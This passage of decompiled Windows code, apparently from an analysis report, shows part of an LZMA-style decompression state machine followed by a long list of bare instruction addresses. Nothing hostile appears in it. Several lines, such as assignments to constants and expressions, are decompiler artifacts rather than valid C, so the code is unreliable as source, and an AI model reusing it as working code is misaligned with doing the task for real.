								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                    0x00406bc0
                                                    0x00406bc7
                                                    0x00406bcd
                                                    0x00406bd3
                                                    0x00000000
                                                    0x00406bd7
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bf9
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c0e
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c59
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c5e
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c76
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406ccd
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd2
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cef
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d35
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073dd
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x00407413
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x00000000
                                                    0x004075cf
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743b
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x00000000
                                                    0x00406dec
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406dcf
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x00000000
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407137
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
